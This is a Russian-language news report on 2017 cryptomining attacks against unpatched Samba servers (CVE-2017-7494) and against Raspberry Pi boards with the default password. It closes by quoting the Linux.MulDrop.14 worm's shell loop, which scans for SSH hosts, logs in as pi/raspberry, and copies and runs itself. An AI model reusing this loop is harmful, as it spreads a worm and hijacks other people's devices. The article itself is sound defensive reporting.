Зафиксированы атаки для майнинга криптовалюты на уязвимых серверах Samba и на Raspberry Pi

11 июня 2017 года

Исследователи лаборатории Касперского зафиксировали активность злоумышленников, связанную с попытками захвата управления над Linux-серверами, на которых не устранена критическая уязвимость (CVE-2017-7494) в Samba, позволяющая выполнить код на сервере. В отличие от похожих целевых атак на Windows-системы с уязвимостью в стеке SMB, атака на Linux-системы сводится к установке не шифровальщика-вымогателя, а ПО для майнинга криптовалют (Trojan-Downloader.Linux.EternalMiner). При успешной атаке на сервер также устанавливается бэкдор для организации удалённого входа (Backdoor.Linux.Agent).

Уязвимость в Samba требует для своей эксплуатации возможности записи в раздел. Как правило, разделы Samba экспортируются только для локальной сети, а наличие разделов Samba с доступом на запись, которые можно примонтировать из внешней сети без авторизации, само по себе уже является уязвимостью и встречается чрезвычайно редко. Отмеченная исследователями атака в основном актуальна как второй этап распространения влияния злоумышленников после первичного взлома клиентских систем в корпоративных локальных сетях. Например, первый этап взлома может осуществляться с использованием методов социальной инженерии через отправку троянского ПО сотрудникам по электронной почте. После запуска троянского ПО осуществляется сканирование доступных в локальной сети серверных систем и поражение тех, что содержат неисправленных уязвимости.

Масштаб атаки пока неизвестен, удалось узнать только характеристики кошелька, на которые поступают полученные в результате майнинга средства. За месяц на кошелёк поступило 98 XMR (около 5.5 тысяч долларов).

Дополнительно можно отметить волну атак на платы Raspberry Pi, которые подключены к глобальной сети без смены устанавливаемого по умолчанию пароля (логин pi, пароль raspberry). Исследователи из компании «Доктор Веб» выявили вредоносное ПО Linux.MulDrop.14, которое сканирует сетевые устройства с пользователем pi и типовыми паролями, задаваемыми по умолчанию, после чего устанавливает на них ПО ZMap, sshpass и компонент для майнинга криптовалют, меняет пароль для пользователя pi и запускает цикл сканирования устройств при помощи zmap с попытками входа по ssh и запуска своей копии:

NAME=`mktemp -u 'XXXXXXXX'`

while [ true ]; do
FILE=`mktemp`
zmap -p 22 -o $FILE -n 100000
killall ssh scp
for IP in `cat $FILE`
do
sshpass -praspberry scp -o ConnectTimeout=6 -o NumberOfPasswordPrompts=1 -o PreferredAuthentications=password -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no $MYSELF pi@$IP:/tmp/$NAME && echo $IP /tmp/.r && sshpass -praspberry ssh pi@$IP -o ConnectTimeout=6 -o NumberOfPasswordPrompts=1 -o PreferredAuthentications=password -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no "cd /tmp && chmod +x $NAME && bash -c ./$NAME" &
done
rm -rf $FILE
sleep 10
done